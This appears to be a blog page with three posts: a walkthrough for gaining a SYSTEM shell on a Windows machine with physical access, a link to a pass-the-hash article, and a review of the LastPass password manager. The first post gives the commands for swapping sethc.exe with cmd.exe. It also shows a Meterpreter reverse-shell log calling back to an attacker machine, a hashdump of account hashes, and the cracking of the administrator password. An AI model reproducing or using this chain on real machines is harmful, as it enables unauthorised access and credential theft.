60seconds of physical access = p0wn3d windows machine

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun

There are two ways to get this access using existing windows services, both involve replacing a helper service file with cmd.exe (or other exe, but we are just getting shell for now) and invoking the “helper” via key presses at the login screen.

Shift Key x5 – “Stickey keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

reboot your target with your favourite bootable image (backtrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, backup the original file and copy in cmd.exe

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your windows login screen, hit Shift 5 time and bingo – shell, with system priv

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] 172.16.189.137:1029 Request received for /Arf3V...
[*] 172.16.189.137:1029 Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] 172.16.189.137:1030 Request received for /Brf3V...
[*] 172.16.189.137:1030 Stage connection for target rf3V received...
[*] Meterpreter session 2 opened (172.16.189.138:443 -> 172.16.189.137:1030) at 2010-09-27 21:35:10
+1000
[*] Session ID 2 (172.16.189.138:443 -> 172.16.189.137:1030) processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information
--  ----                   -----------
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488                                                   .137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  : 172.16.189.137
Netmask     : 255.255.255.0

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter captured hash: 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d

Another way to achieve the same goal is with Utilman.exe & then using WindowsKey + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out.

Dissecting the Pass the Hash Attack

Nice to see an article including Backtrack on the windowsecurity.com list. Its a nice writeup on using backtrack to pass the hash to use psexec to remotely launch a reverse shell. If you havent read much about using password hashes, this would be a good read. It also links to other articles about gaining access to hashed passwords, from physical box access to various tools.

In this article we will look at how this technique works and I will demonstrate the process that can be used to take stolen password hashes and use them successfully without having to crack their hidden contents. As always, I will cover some detection and defensive techniques on how you can prevent yourself from falling victim to this attack.

via Dissecting the Pass the Hash Attack.

lastpass – the last password you will need to remember

So, thats the tagline, but does it really work – I was pretty skeptical.

I had previously used a combination of mashedlife.com (for the cloud) – secured by a yubikey usb one time password token. This was great, I could log into mashedlife, using my otp token, then when I needed to log into a secure website, I would just click on a bookmarklet – and the username & password would automagically be transferred via ssl into the page. This works great, but I always wondered about security etc etc. It was secured by my one time password & a pin number, so there was really no option for replaying if I logged on via a net cafe with a keylogger – but in my ever increasing need for change & “projects” – I wanted something else.

Enter lastpass. I was having a poke around on their site, being pretty impressed with what I saw – but without knowing all the details, was reluctant to try it out. I then found a review by Steve Gibson aka Security Now Podcast aka GRC.com here. Some of the highlights for me were:

“at no point does LastPass receive anything other than what looks like a block of pseudorandom noise. We’ve talked about how, when you take so-called plaintext, the normal readable, human readable, your username as an email address and your actual password, and you encrypt it with a good cipher, it turns it into, under the influence of a key, which is the key to the whole process, under the influence of the key, it turns it into noise, absolute pseudorandom bits that mean nothing. “

“So the idea is that when you log in, when you give your system your LastPass username and password, the first thing it does is it runs it through this SHA – it lowercases the email address, removes the white space, adds the password, and then it does this hash to it, turning it into a 256-bit blob which tells the blob holder nothing about your username and password. It’s just like it’s been digested into this thing. In fact, hashes are called “digests,” also, for that reason.

What that is, is that is your cryptographic key. That’s the key which your system will use, both to encrypt your data which is being shared with LastPass Corporate, and also to decrypt it when LastPass Corporate sends this back to you. They’re holding the encrypted results of your own personal database, just because that’s what they do. That’s the service they provide, essentially, that and creating all these amazing plug-ins for everything anyone’s ever heard of. So but what they’re holding, they have no ability to decrypt. They never get the key. That never leaves your system. “

“So the whole concept here is that we establish a database of domains that we’re logging into, and usernames and passwords for those domains. And this is our personal database. And the beauty of this, and I’ve been playing with this now for about a week, is that, for example, I did change a couple passwords because I’d been a little lazy, too. And I thought, okay, now’s the time. So I changed those passwords here at home on my system in Firefox, and changed them in the website. And LastPass watched me change them. I said, okay, remember this. And LastPass remembered it.”

After digesting Steve’s review, I gave it a go. I had previously been using keepass, but keeping it synced was beginning to be a PITA – which version of my keepass database was correct, was it the one on my USB stick, the one I had copied to Google Docs, the one I had in Dropbox or the one on my laptop. If I want to change a password, which database do I change it in & then have to scratch my head about which one I copy over the other one ….. messy.

I create my lastpass account, upload the accounts from my keepass database & start to play. It allows me to do a security check, checking out how secure my passwords are, multiple uses etc. It works on Firefox / IE / safari on either my mac or windows or work pc (generic windows browser plugins installed) all seamlessly.

The sites I usually have to bust out my keypass database or mashedlife account from the cloud – I just log into the lastpass browser plugin, it downloads & decrypts the account database and for the rest of my browsing session – whenever I open a page that requires logging into, lastpass just enters the username & password automagically for me – kind of like browser password remembering – except its not stored in clear text like the browsers do.

So back to the whole cyber cafe in the back streets of some dingy city – you need to log into a site but are worried about keyloggers. Lastpass has you covered for this – for starters, you have an on screen keyboard, this way the malware infected machine you are on cannot capture the keystrokes. Not for you ? then how about single use passwords – without a dongle. You login in advance, go to their one time password section & print out a list of them. Or maybe you prefer a second factor on your standard login – you can use their grid system, where you login & then it prompts you for a 4 characters from a printed grid sheet (think battleship).

Anyway – im sold on it. Its secure, it is truly cloud based & accessible from any platform at any time. If you use keepass or one of those, do yourself a favour & check out lastpass.